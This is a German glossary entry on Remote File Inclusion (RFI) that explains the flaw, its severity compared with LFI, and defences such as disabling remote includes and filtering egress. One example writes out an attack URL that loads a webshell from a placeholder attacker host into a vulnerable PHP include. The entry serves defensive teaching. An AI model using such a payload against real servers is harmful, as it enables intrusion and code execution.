Remote File Inclusion (RFI)
Was ist Remote File Inclusion (RFI)?
Remote File Inclusion (RFI)Schwachstelle, die einem Angreifer erlaubt, einen Server zum Laden und Ausführen von Code aus einer beliebigen Remote-URL zu zwingen.
Remote File Inclusion (RFI) tritt auf, wenn eine Anwendung benutzerkontrollierte Eingaben an eine include- oder require-Funktion übergibt und das Runtime Remote-URLs erlaubt (etwa PHP mit aktiviertem allow_url_include). Der Server lädt die Datei von einem angreiferkontrollierten Host und führt sie im Prozesskontext der Anwendung aus – das führt unmittelbar zu Remote Code Execution. RFI ist meist schwerwiegender als LFI, weil kein vorheriger Schreibzugriff auf den Server nötig ist. Schutzmaßnahmen sind das Deaktivieren der Remote-URL-Einbindung im Runtime, strenge Allowlists statischer Modulnamen, niemals auf Benutzereingaben basierende Pfade einzubinden und Anwendungsserver mit strengem Egress-Filtering zu segmentieren.
● Beispiele
- 01
Eine PHP-Anwendung mit include($_GET['page']): ?page=https://angreifer.example/shell.txt lädt und führt eine Webshell aus.
- 02
Ein veraltetes CMS-Plugin lädt eine Admin-Seite aus einem URL-Parameter und erlaubt die Ausführung einer angreiferseitig gehosteten PHP-Datei.
● Häufige Fragen
Was ist Remote File Inclusion (RFI)?
Schwachstelle, die einem Angreifer erlaubt, einen Server zum Laden und Ausführen von Code aus einer beliebigen Remote-URL zu zwingen. Es gehört zur Kategorie Angriffe und Bedrohungen der Cybersicherheit.
Was bedeutet Remote File Inclusion (RFI)?
Schwachstelle, die einem Angreifer erlaubt, einen Server zum Laden und Ausführen von Code aus einer beliebigen Remote-URL zu zwingen.
Wie schützt man sich gegen Remote File Inclusion (RFI)?
Schutzmaßnahmen gegen Remote File Inclusion (RFI) kombinieren typischerweise technische Kontrollen und operative Praktiken, wie in der Definition oben beschrieben.
Welche anderen Bezeichnungen gibt es für Remote File Inclusion (RFI)?
Übliche alternative Bezeichnungen: RFI.